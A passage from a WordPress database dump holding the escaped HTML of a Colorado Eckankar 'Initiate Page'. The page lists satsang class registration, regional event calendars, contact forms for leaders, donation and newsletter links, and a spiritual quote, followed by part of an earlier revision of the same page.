0px 0px 56px; color: #ad7a05;\" data-font-family=\"Alegreya SC\" data-font-weight=\"400\" data-font-style=\"\">Initiate Pages</h1>\r\n</blockquote>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-testimonial-10 boldgrid-section dynamic-gridblock background-parallax\" style=\"color: #1d1d1d; background-position: 50% 50%; background-size: cover; background-color: #f5f2eb;\" data-bg-overlaycolor=\"rgba(255, 255, 255, 0.8)\">\r\n<div class=\"container-fluid\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 0px;\">\r\n<div class=\"col-md-10 col-sm-8 col-xs-12 text-center col-lg-12\" style=\"padding: 2em; box-shadow: rgba(0, 0, 0, 0.1) 0px 4px 6px -1px, rgba(0, 0, 0, 0.06) 0px 2px 4px -1px;\">\r\n<p class=\"\" style=\"font-size: 24px; font-family: Raleway; font-weight: 400;\" data-font-family=\"Raleway\" data-font-weight=\"400\" data-font-style=\"\">These pages are for those who have enrolled in Eckankar’s Spiritual Living Courses.<br>\r\nAll are welcome to explore the benefits of the ECK courses and initiation&nbsp;<a href=\"https://www.eckankar.org/engage/advanced-spiritual-living/eck-initations/\" target=\"_blank\" rel=\"noopener\">here</a>.</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-call_to_action-1 boldgrid-section dynamic-gridblock background-parallax\" style=\"background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2023/09/web-promo-bk-6.jpg\'); background-size: cover; background-position: 50% 50%;\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/09/web-promo-bk-6.jpg\">\r\n<div class=\"container-fluid\">\r\n<div class=\"row\" style=\"padding-bottom: 23px; padding-top: 23px;\">\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\"></div>\r\n<div class=\"col-md-7 col-sm-8 col-xs-12 col-lg-4\" style=\"box-shadow: #cecece 0px 0px 0px 0px inset;\">\r\n<div class=\"bg-box-cover bg-box bg-alpha-879 bg-background-color color1-background-color color-1-text-contrast\" style=\"padding: 30px 5%; box-shadow: #cecece 0px 0px 0px 0px inset;\" data-alpha=\"0.82\" data-bg-uuid=\"bg-alpha-879\">\r\n<p class=\"\" style=\"font-weight: 600; text-transform: none; font-size: 22px; line-height: 24px; color: #3e3e3e;\" data-font-weight=\"600\">Now Open For Registration</p>\r\n<p class=\"bg-font-family-alt\" style=\"color: #b67d00; font-size: 43px; line-height: 47px;\">2023-2024<br>\r\nInitiate&nbsp;<br>\r\nSatsang Classes</p>\r\n<p class=\"bg-font-family-alt\" style=\"font-size: 17px; line-height: 27px; color: #3e3e3e;\">An ECK Satsang class is a gathering of ECK initiates who choose to come together once or twice a month to further their spiritual understanding through study of the ECK discourses.</p>\r\n<p class=\"\"><a class=\"btn btn-raised btn-rounded btn-color-1\" href=\"https://eckankar-colorado.org/resa-faq/satsang-class-registrations-2023-2024/\" rel=\"noopener\">Register Now</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-services-14 boldgrid-section dynamic-gridblock bg-background-color color1-background-color color-1-text-contrast\">\r\n<div class=\"container-fluid\">\r\n<div class=\"row bg-background-color color1-background-color color-1-text-contrast\" style=\"padding-top: 64px;\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\" style=\"box-shadow: #cecece 0px 0px 0px 0px;\">\r\n<p class=\"\" style=\"text-align: center; font-size: 27px; text-transform: capitalize; font-family: Raleway; font-weight: 600; box-shadow: #cecece 0px 0px 0px 0px; padding-bottom: 1em; color: #ad7a05;\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">INITIATE EVENT CALENDARS</p>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 54px; background-color: #ffffff;\">\r\n<div class=\"col-md-3 col-sm-4 col-xs-12 text-center col-lg-3\">\r\n<h4 class=\"\" style=\"text-transform: uppercase; font-family: \'Open Sans\'; font-weight: 500;\" data-font-family=\"Open Sans\" data-font-weight=\"500\" data-font-style=\"\">Central Colorado</h4>\r\n<p class=\"\" style=\"margin-right: -15px; margin-left: -15px;\"><img class=\"bg-img alignnone wp-image-205232 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2019/12/eck-temple-member-cal-promo.jpg\" alt=\"Clear mountain stream with driftwood near the shore\" width=\"411\" height=\"231\"></p>\r\n<p class=\"wow headShake\" style=\"margin-top: -50px; text-align: center;\" data-wow-duration=\"1s\" data-wow-delay=\"1s\"><a class=\"color1-background-color color-3-text-contrast bg-background-color btn btn-rounded btn-regular\" href=\"https://eckankar-colorado.org/central-colorado-member-calendar-mec/\">Go Now!</a></p>\r\n</div>\r\n<div class=\"col-md-3 col-sm-4 col-xs-12 text-center col-lg-3\" data-bg-color-1=\"rgb(41, 100, 219)\" data-bg-color-2=\"rgb(255, 255, 255)\" data-bg-direction=\"to bottom\">\r\n<h4 class=\"\" style=\"text-transform: uppercase; font-family: \'Open Sans\'; font-weight: 500;\" data-font-family=\"Open Sans\" data-font-weight=\"500\" data-font-style=\"\">colorado springs</h4>\r\n<p class=\"\" style=\"margin-right: -15px; margin-left: -15px;\"><img class=\"bg-img alignnone wp-image-252359 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2020/01/cosprings-member-cal-promo.jpg\" alt=\"\" width=\"411\" height=\"231\"></p>\r\n<p class=\"wow headShake\" style=\"margin-top: -50px; text-align: center;\" data-wow-duration=\"1s\" data-wow-delay=\"1s\"><a class=\"color1-background-color color-3-text-contrast bg-background-color btn btn-rounded btn-regular\" href=\"https://eckankar-colorado.org/colorado-springs-member-calendar-mec/\">Go Now!</a></p>\r\n</div>\r\n<div class=\"col-md-3 col-sm-4 col-xs-12 text-center col-lg-3\">\r\n<h4 class=\"\" style=\"text-transform: uppercase; font-family: \'Open Sans\'; font-weight: 500;\" data-font-family=\"Open Sans\" data-font-weight=\"500\" data-font-style=\"\">loveland</h4>\r\n<p class=\"\" style=\"margin-right: -15px; margin-left: -15px;\"><img class=\"bg-img alignnone wp-image-205233 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2020/01/loveland-member-cal-promo.jpg\" alt=\"Green meadow overlooking mountains with clouds in the background\" width=\"411\" height=\"231\"></p>\r\n<p class=\"wow headShake\" style=\"margin-top: -50px; text-align: center;\" data-wow-duration=\"1s\" data-wow-delay=\"1s\"><a class=\"color1-background-color color-3-text-contrast bg-background-color btn btn-rounded btn-regular\" href=\"https://eckankar-colorado.org/loveland-member-calendar-mec/\">Go Now!</a></p>\r\n</div>\r\n<div class=\"col-md-3 col-sm-4 col-xs-12 text-center col-lg-3\">\r\n<h4 class=\"\" style=\"text-transform: uppercase; font-family: \'Open Sans\'; font-weight: 500; letter-spacing: 0px;\" data-font-family=\"Open Sans\" data-font-weight=\"500\" data-font-style=\"\">Mountain Areas</h4>\r\n<p class=\"\" style=\"margin-right: -15px; margin-left: -15px;\"><img class=\"bg-img alignnone wp-image-205233 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2020/12/mountain-area-member-cal-promo.jpg\" alt=\"Fall foliage and a mountain stream\" width=\"411\" height=\"231\"></p>\r\n<p class=\"wow headShake\" style=\"margin-top: -50px; text-align: center;\" data-wow-duration=\"1s\" data-wow-delay=\"1s\"><a class=\"color1-background-color color-3-text-contrast bg-background-color btn btn-rounded btn-regular\" href=\"https://eckankar-colorado.org/mountain-area-member-calendar-mec/\">Go Now!</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-testimonial-10 boldgrid-section dynamic-gridblock background-parallax\" style=\"color: #1d1d1d; background-position: 50% 50%; background-size: cover; background-color: #f5f2eb;\" data-bg-overlaycolor=\"rgba(255, 255, 255, 0.8)\">\r\n<div class=\"container-fluid\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 0px;\">\r\n<div class=\"col-md-1 col-sm-2 col-xs-12 col-lg-1\"></div>\r\n<div class=\"col-md-10 col-sm-8 col-xs-12 text-center col-lg-10\" style=\"padding: 2em;\">\r\n<p class=\"h3\" style=\"font-weight: 600; margin-top: 20px; margin-bottom: 20px; font-family: Raleway; font-size: 24px; text-transform: none; font-style: italic; border-width: 0px; color: #3e3e3e;\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"italic\"><i class=\"fa bg-inserted-icon fa-quote-left\" style=\"font-size: 35px; box-shadow: #cecece 0px 0px 0px 0px inset; color: #d5b56b;\" aria-hidden=\"true\">&nbsp;&nbsp; </i>We are personally responsible for our own state of consciousness. As Soul unfolds toward total freedom, It understands total responsibility must be accepted for every thought and action.&nbsp;&nbsp;</p>\r\n<h4 class=\"color3-color bg-font-family-alt\" style=\"text-transform: capitalize;\">—Harold Klemp</h4>\r\n<p class=\"\"><em><a class=\"bg-font-family-alt\" href=\"http://www.eckbooks.org/items/The_Language_of_Soul-943-6.html\" target=\"_blank\" rel=\"noopener noreferrer\">The Language of Soul</a></em></p>\r\n</div>\r\n<div class=\"col-md-1 col-sm-2 col-xs-12 col-lg-1\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-testimonial-3 boldgrid-section dynamic-gridblock bg-background-color color1-background-color color-1-text-contrast\">\r\n<div class=\"container-fluid\">\r\n<div class=\"row\" style=\"padding-top: 24px; padding-bottom: 26px;\">\r\n<div class=\"col-md-3 col-sm-6 col-xs-12 text-center col-lg-3\">\r\n<p class=\"mod-reset\">&nbsp;</p>\r\n<p class=\"h3\" style=\"text-transform: capitalize; font-size: 25px; padding-bottom: 8px; font-family: Raleway; font-weight: 500; color: #ad7a05; box-shadow: #cecece 0px 0px 0px 0px inset;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">Colorado State<br>\r\nRESA Structure</p>\r\n<div class=\"row\" style=\"box-shadow: #cecece 0px 0px 0px 0px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div class=\"\" style=\"padding: 15px 10px; border-top: 10px solid #d5b56b; margin-bottom: 20px; box-shadow: rgba(50, 50, 93, 0.25) 0px 30px 60px -12px, rgba(0, 0, 0, 0.3) 0px 18px 36px -18px;\">\r\n<p class=\"\" style=\"font-size: 18px;\">How does the Colorado RESA structure work? Check the chart or FAQ to get a quick overview.<br>\r\n<br>\r\n<a class=\"\" style=\"font-size: 18px;\" href=\"https://eckankar-colorado.org/wp-content/uploads/2023/07/RESA-Org-Chart-5.13.23.pdf\">Org Chart </a>/ <a class=\"\" style=\"font-size: 18px;\" href=\"https://eckankar-colorado.org/resa-faq/\" target=\"_blank\" rel=\"noopener\">RESA FAQ</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-3 col-sm-6 col-xs-12 text-center col-lg-3\">\r\n<p class=\"mod-reset\">&nbsp;</p>\r\n<p class=\"h3\" style=\"text-transform: capitalize; font-size: 25px; padding-bottom: 8px; font-family: Raleway; font-weight: 500; color: #ad7a05;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">Initiator and ECK<br>\r\nSpiritual Aides</p>\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div class=\"\" style=\"padding: 15px 10px; border-top: 10px solid #d5b56b; margin-bottom: 20px; box-shadow: rgba(50, 50, 93, 0.25) 0px 30px 60px -12px, rgba(0, 0, 0, 0.3) 0px 18px 36px -18px;\">\r\n<p class=\"\" style=\"font-size: 17px;\">Easily contact an ECK Initiator or request an ECK Spiritual Aide by filling out a simple form.<br>\r\n<br>\r\n<a class=\"\" style=\"font-size: 18px;\" href=\"https://eckankar-colorado.org/resa-faq/eck-initiator-and-esa-scheduling-form/\">Go Here To Get In Touch</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-3 col-sm-6 col-xs-12 text-center col-lg-3\">\r\n<p class=\"mod-reset\">&nbsp;</p>\r\n<p class=\"h3\" style=\"text-transform: capitalize; font-size: 25px; padding-bottom: 8px; font-family: Raleway; font-weight: 500; color: #ad7a05;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">State Leader<br>\r\nContacts</p>\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div class=\"\" style=\"padding: 15px 10px; border-top: 10px solid #d5b56b; margin-bottom: 20px; box-shadow: rgba(50, 50, 93, 0.25) 0px 30px 60px -12px, rgba(0, 0, 0, 0.3) 0px 18px 36px -18px;\">\r\n<p class=\"\" style=\"font-size: 17px; margin: 0px;\">Got a question or feedback for Colorado ECK leaders? Contact local RESA structure leaders.<br>\r\n<br>\r\n<a class=\"\" style=\"font-size: 18px;\" href=\"https://eckankar-colorado.org/resa-faq/colorado-statewide-leadership-contacts/\">Contact an ECK Leader</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-3 col-sm-6 col-xs-12 text-center col-lg-3\">\r\n<p class=\"mod-reset\">&nbsp;</p>\r\n<p class=\"h3\" style=\"text-transform: capitalize; font-size: 25px; padding-bottom: 8px; font-family: Raleway; font-weight: 500; color: #ad7a05;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">Add/Update Email<br>\r\nor Mail Address</p>\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div class=\"\" style=\"padding: 15px 10px; border-top: 10px solid #d5b56b; margin-bottom: 20px; box-shadow: rgba(50, 50, 93, 0.25) 0px 30px 60px -12px, rgba(0, 0, 0, 0.3) 0px 18px 36px -18px;\">\r\n<p class=\"\" style=\"font-size: 17px; margin: 0px;\">Update your information to stay informed about all the ECK news in Colorado!<br>\r\n<br>\r\n<a class=\"\" style=\"font-size: 18px;\" href=\"https://eckankar-colorado.org/update-email-mail/\">Add/Update Now</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"temp-gridblock-wrapper\"></div>\r\n<div class=\"tmpl-services-2 boldgrid-section dynamic-gridblock background-fixed\" style=\"color: #e8e5e5; box-shadow: #cecece 0px 2px 4px -1px inset; background-image: linear-gradient(to left, rgba(255, 255, 255, 0.67), rgba(255, 255, 255, 0.67)), url(\'https://eckankar-colorado.org/wp-content/uploads/2023/10/sunset-gold-ocean-eagle-7.jpg\'); background-size: cover; background-position: 50% 50%;\" data-bg-overlaycolor-alpha=\"0.67\" data-bg-overlaycolor-class=\"1\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/10/sunset-gold-ocean-eagle-7.jpg\" data-bg-overlaycolor=\"rgba(255, 255, 255,0.67)\">\r\n<div class=\"container-fluid\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; margin-top: 0px; padding-top: 0px;\">\r\n<div class=\"col-md-1 col-sm-12 col-xs-12 col-lg-1\"></div>\r\n<div class=\"col-md-5 col-sm-6 col-xs-10 align-column-center col-lg-5\" style=\"padding-right: 1em; box-shadow: #cecece 0px 2px 4px -1px inset; padding-left: 0em;\">\r\n<div style=\"border: 5px solid; margin-right: -50px; z-index: 1; position: relative; padding-top: 0px; padding-bottom: 0px; border-color: #d5b56b !important; box-shadow: rgba(0, 0, 0, 0.3) 0px 19px 38px, rgba(0, 0, 0, 0.22) 0px 15px 12px;\" class=\" bg-box bg-alpha-209\" data-alpha=\"0.96\" data-bg-uuid=\"bg-alpha-209\">\r\n<div class=\"row\" style=\"box-shadow: #cecece 0px 2px 4px -1px inset; margin-left: -11px; margin-right: -15px;\">\r\n<div class=\"col-md-6 col-sm-6 col-xs-12 color1-background-color color-1-text-contrast bg-background-color col-lg-6\" style=\"margin-left: -3px; padding: 1.5em;\">\r\n<div>\r\n<h2 class=\"color3-color\" style=\"font-size: 36px; text-align: center; font-family: \'Raleway\'; font-weight: 500;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">Welcome</h2>\r\n<h4 class=\"\" style=\"font-size: 25px; text-align: center; font-family: \'Open Sans\'; font-weight: 500;\" data-font-family=\"Open Sans\" data-font-weight=\"500\" data-font-style=\"\">ECk Initiates</h4>\r\n<h4 class=\"\" style=\"font-size: 23px;\"><br>\r\n<img class=\"aligncenter wp-image-68742 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2019/07/ek-sym-gold-sm.png\" alt=\"ECK Symbol\" width=\"71\" height=\"71\"></h4>\r\n</div>\r\n</div>\r\n<div class=\"col-md-6 col-sm-6 col-xs-12 align-column-center col-lg-6\">\r\n<div style=\"padding: 1em 1em 1em 1em;\" class=\"bg-box\">\r\n<p class=\"\" style=\"font-size: 24px; font-weight: 600; font-family: \'Raleway\'; color: rgba(62, 62, 62, 0.9);\" data-font-weight=\"600\" data-font-family=\"Raleway\" data-font-style=\"\">Divine love is not something you can talk about, but it is something that you can demonstrate as you live.</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-1 col-sm-1 col-xs-2 col-lg-1\" style=\"background-color: #f5f2eb;\"></div>\r\n<div class=\"col-md-5 col-sm-5 col-xs-12 col-lg-5\" style=\"padding: 0em; background-color: #f5f2eb;\">\r\n<div class=\"row\" style=\"margin-top: 50px; margin-bottom: 50px; box-shadow: #cecece 0px 0px 0px 0px inset;\">\r\n<div class=\"col-md-1 col-sm-2 col-xs-2 col-lg-1\">\r\n<div><i class=\"fa fa-heart\" style=\"font-size: 35px; box-shadow: #cecece 0px 0px 0px 0px inset; color: #d5b56b;\" aria-hidden=\"true\"><span style=\"display: none;\">&nbsp;</span></i></div>\r\n</div>\r\n<div class=\"col-md-10 col-sm-9 col-xs-10 col-lg-10\">\r\n<div>\r\n<h3 class=\"\" style=\"margin-top: 0px; margin-bottom: 15px; font-family: \'Raleway\'; font-weight: 600; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Donations</h3>\r\n<p class=\"color3-color\" style=\"font-size: 17px;\"><span class=\"\">Giving to Eckankar in Colorado is simple. Your donations will help us continue to reach the public and grow Eckankar within the state. All donations of any size are greatly appreciated. </span></p>\r\n<p class=\"color3-color\" style=\"font-size: 17px;\"><span class=\"\">You Can Use PayPal or Credit Card.<br>\r\n<a href=\"https://www.paypal.com/donate?hosted_button_id=WAKYPRQYTCFXE\">Donate Online Now</a> (or by <a href=\"https://eckankar-colorado.org/wp-content/uploads/2019/12/Donation-authorization-form-12-2019-ch.pdf\" target=\"_blank\" rel=\"noopener noreferrer\">Mail-in)</a></span></p>\r\n</div>\r\n</div>\r\n<div class=\"col-md-1 col-sm-1 col-xs-12 col-lg-1\">\r\n<div></div>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"margin-top: 50px; margin-bottom: 50px;\">\r\n<div class=\"col-md-1 col-sm-2 col-xs-2 col-lg-1\">\r\n<div><i class=\"fa fa-newspaper-o\" style=\"font-size: 35px; box-shadow: #cecece 0px 0px 0px 0px; color: #d5b56b;\" aria-hidden=\"true\"><span style=\"display: none;\">&nbsp;</span></i></div>\r\n</div>\r\n<div class=\"col-md-10 col-sm-9 col-xs-10 col-lg-10\">\r\n<div>\r\n<h3 class=\"\" style=\"margin-top: 0px; margin-bottom: 15px; font-family: \'Raleway\'; font-weight: 600; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">INITIATE Newsletter Signup</h3>\r\n<p class=\"color3-color\" style=\"font-size: 17px;\">Sign up to receive your local Initiate Newsletter!<br>\r\nGet all the latest news and events from around the state. <br>\r\n<a class=\"\" href=\"https://eckankar-colorado.org/newsletter-subscription-members/\">Sign Up Today!</a></p>\r\n</div>\r\n</div>\r\n<div class=\"col-md-1 col-sm-1 col-xs-12 col-lg-1\"></div>\r\n</div>\r\n<div class=\"row\" style=\"margin-top: 50px; margin-bottom: 50px;\">\r\n<div class=\"col-md-1 col-sm-2 col-xs-2 col-lg-1\">\r\n<div><i class=\"fa fa-check-square-o\" style=\"font-size: 35px; box-shadow: #cecece 0px 0px 0px 0px inset; color: #d5b56b;\" aria-hidden=\"true\"><span style=\"display: none;\">&nbsp;</span></i></div>\r\n</div>\r\n<div class=\"col-md-10 col-sm-9 col-xs-10 col-lg-10\">\r\n<div>\r\n<h3 class=\"\" style=\"margin-top: 0px; margin-bottom: 15px; font-family: \'Raleway\'; font-weight: 600; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Email Whitelisting</h3>\r\n<p class=\"color3-color\" style=\"font-size: 17px;\">Whitelisting is the process of adding our email to an approved sender list, so emails from us will not be blocked or sent to spam.<br>\r\n<a class=\"\" href=\"https://eckankar-colorado.org/email-whitelisting/\">Learn How To Do It</a></p>\r\n</div>\r\n</div>\r\n<div class=\"col-md-1 col-sm-1 col-xs-12 col-lg-1\"></div>\r\n</div>\r\n<div class=\"row\" style=\"margin-top: 50px; margin-bottom: 50px;\">\r\n<div class=\"col-md-1 col-sm-2 col-xs-2 col-lg-1\">\r\n<div><i class=\"fa fa-star\" style=\"font-size: 35px; box-shadow: #cecece 0px 0px 0px 0px; color: #d5b56b;\" aria-hidden=\"true\"><span style=\"display: none;\">&nbsp;</span></i></div>\r\n</div>\r\n<div class=\"col-md-10 col-sm-9 col-xs-10 col-lg-10\">\r\n<div>\r\n<h3 class=\"\" style=\"margin-top: 0px; margin-bottom: 15px; font-family: \'Raleway\'; font-weight: 600; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Got a Vahana Project Idea?</h3>\r\n<p class=\"color3-color\" style=\"font-size: 17px;\">Do you want to help serve the Mahanta’s mission and have a great idea to share? We want to know about it!</p>\r\n<p class=\"color3-color\" style=\"font-size: 17px;\">Let us know how we can work together.<br>\r\n<a href=\"https://eckankar-colorado.org/chela-ideas/\">Click here to share the details</a></p>\r\n</div>\r\n</div>\r\n<div class=\"col-md-1 col-sm-1 col-xs-12 col-lg-1\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(237252,40317,'post_type','page'),(237253,40317,'post_title','Initiate Page'),(237254,40317,'post_prev_post_content','<div class=\"tmpl-call_to_action-12 boldgrid-section dynamic-gridblock background-fixed\" style=\"color: #1d1d1d; box-shadow: #cecece 0px 0px 0px 0px inset; background-image: linear-gradient(to left, rgba(255, 255, 255, 0.18), rgba(255, 255, 255, 0.18)), url(\'https://eckankar-colorado.org/wp-content/uploads/2023/10/tree-path-5.jpg\'); background-size: cover; background-position: 50% 50%;\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/10/tree-path-5.jpg\" data-bg-overlaycolor=\"rgba(255, 255, 255,0.18)\" data-bg-overlaycolor-alpha=\"0.18\" data-bg-overlaycolor-class=\"1\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 75px; padding-bottom: 300px;\">\r\n<div class=\"col-lg-3 col-md-12 col-sm-12 col-xs-12\"></div>\r\n<div class=\"col-md-8 col-sm-10 col-xs-12 text-center col-lg-6\" style=\"text-align: left; padding: 0em; background-color: rgba(255, 255, 255, 0); box-shadow: #cecece 0px 0px 0px 0px inset;\">\r\n<blockquote class=\"color1-border-color\" style=\"margin: 52px 16px 20px auto; border-style: none; border-width: 0px; color: #585858; padding: 0em 2em 1em 5%; border-radius: 8px; background-color: none; width: 100%;\">\r\n<h1 class=\"\" style=\"text-transform: capitalize; font-size: 106px; letter-spacing: 2px; margin-top: 52px; box-shadow: #cecece 0px 0px 0px 0px; padding-left: 0em; margin-left: auto; margin-right: auto; text-align: center; width: auto; font-family: \'Alegreya SC\'; font-weight: 400; line-height: 89px; text-shadow: #ffffff 0px 0px 56px; color: #ad7a05;\" data-font-family=\"Alegreya SC\" data-font-weight=\"400\" data-font-style=\"\">Initiate Pages</h1>\r\n</blockquote>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-testimonial-10 boldgrid-section dynamic-gridblock background-parallax\" style=\"color: #1d1d1d; background-position: 50% 50%; background-size: cover; background-color: #f5f2eb;\" data-bg-overlaycolor=\"rgba(255, 255, 255, 0.8)\">\r\n<div class=\"container-fluid\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 0px;\">\r\n<div class=\"col-md-10 col-sm-8 col-xs-12 text-center col-lg-12\" style=\"padding: 2em; box-shadow: rgba(0, 0, 0, 0.1) 0px 4px 6px -1px, rgba(0, 0, 0, 0.06) 0px 2px 4px -1px;\">\r\n<p class=\"\" style=\"font-size: 24px; font-family: Raleway; font-weight: 400;\" data-font-family=\"Raleway\" data-font-weight=\"400\" data-font-style=\"\">These pages are for those who have enrolled in Eckankar’s Spiritual Living Courses.<br>\r\nAll are welcome to explore the benefits of the ECK courses and initiation&nbsp;<a href=\"https://www.eckankar.org/engage/advanced-spiritual-living/eck-initations/\" target=\"_blank\" rel=\"noopener\">here</a>.</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-call_to_action-1 boldgrid-section dynamic-gridblock background-parallax\" style=\"background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2023/09/web-promo-bk-6.jpg\'); background-size: cover; background-position: 50% 50%;\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/09/web-promo-bk-6.jpg\">\r\n<div class=\"container-fluid\">\r\n<div class=\"row\" style=\"padding-bottom: 23px; padding-top: 23px;\">\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\"></div>\r\n<div class=\"col-md-7 col-sm-8 col-xs-12 col-lg-4\" style=\"box-shadow: #cecece 0px 0px 0px 0px inset;\">\r\n<div class=\"bg-box-cover bg-box bg-alpha-879 bg-background-color color1-background-color color-1-text-contrast\" style=\"padding: 30px 5%; box-shadow: #cecece 0px 0px 0px 0px inset;\" data-alpha=\"0.82\" data-bg-uuid=\"bg-alpha-879\">\r\n<p class=\"\" style=\"font-weight: 600; text-transform: none; font-size: 22px; line-height: 24px; color: #3e3e3e;\" data-font-weight=\"600\">Now Open For Registration</p>\r\n<p class=\"bg-font-family-alt\" style=\"color: #b67d00; font-size: 43px; line-height: 47px;\">2023-2024<br>\r\nInitiate&nbsp;<br>\r\nSatsang Classes</p>\r\n<p class=\"bg-font-family-alt\" style=\"font-size: 17px; line-height: 27px; color: #3e3e3e;\">An ECK Satsang class is a gathering of ECK initiates who choose to come together once or twice a month to further their spiritual understanding through study of the ECK discourses.</p>\r\n<p class=\"\"><a class=\"btn btn-raised btn-rounded btn-color-1\" href=\"https://eckankar-colorado.org/resa-faq/satsang-class-registrations-2023-2024/\" rel=\"noopener\">Register Now</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-services-14 boldgrid-section dynamic-gridblock bg-background-color color1-background-color color-1-text-contrast\">\r\n<div class=\"container-fluid\">\r\n<div class=\"row bg-background-color color1-background-color color-1-text-contrast\" style=\"padding-top: 64px;\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\" style=\"box-shadow: #cecece 0px 0px 0px 0px;\">\r\n<p class=\"\" style=\"text-align: center; font-size: 27px; text-transform: capitalize; font-family: Raleway; font-weight: 600; box-shadow: #cecece 0px 0px 0px 0px; padding-bottom: 1em; color: #ad7a05;\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">INITIATE EVENT CALENDARS</p>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 54px; background-color: #ffffff;\">\r\n<div class=\"col-md-3 col-sm-4 col-xs-12 text-center col-lg-3\">\r\n<h4 class=\"\" style=\"text-transform: uppercase; font-family: \'Open Sans\'; font-weight: 500;\" data-font-family=\"Open Sans\" data-font-weight=\"500\" data-font-style=\"\">Central Colorado</h4>\r\n<p class=\"\" style=\"margin-right: -15px; margin-left: -15px;\"><img class=\"bg-img alignnone wp-image-205232 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2019/12/eck-temple-member-cal-promo.jpg\" alt=\"Clear mountain stream with driftwood near the shore\" width=\"411\" height=\"231\"></p>\r\n<p class=\"wow headShake\" style=\"margin-top: -50px; text-align: center;\" data-wow-duration=\"1s\" data-wow-delay=\"1s\"><a class=\"color1-background-color color-3-text-contrast bg-background-color btn btn-rounded btn-regular\" href=\"https://eckankar-colorado.org/central-colorado-member-calendar-mec/\">Go Now!</a></p>\r\n</div>\r\n<div class=\"col-md-3 col-sm-4 col-xs-12 text-center col-lg-3\" data-bg-color-1=\"rgb(41, 100, 219)\" data-bg-color-2=\"rgb(255, 255, 255)\" data-bg-direction=\"to bottom\">\r\n<h4 class=\"\" style=\"text-transform: uppercase; font-family: \'Open Sans\'; font-weight: 500;\" data-font-family=\"Open Sans\" data-font-weight=\"500\" data-font-style=\"\">colorado springs</h4>\r\n<p class=\"\" style=\"margin-right: -15px; margin-left: -15px;\"><img class=\"bg-img alignnone wp-image-252359 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2020/01/cosprings-member-cal-promo.jpg\" alt=\"\" width=\"411\" height=\"231\"></p>\r\n<p class=\"wow headShake\" style=\"margin-top: -50px; text-align: center;\" data-wow-duration=\"1s\" data-wow-delay=\"1s\"><a class=\"color1-background-color color-3-text-contrast bg-background-color btn btn-rounded btn-regular\" href=\"https://eckankar-colorado.org/colorado-springs-member-calendar-mec/\">Go Now!</a></p>\r\n</div>\r\n<div class=\"col-md-3 col-sm-4 col-xs-12 text-center col-lg-3\">\r\n<h4 class=\"\" style=\"text-transform: uppercase; font-family: \'Open 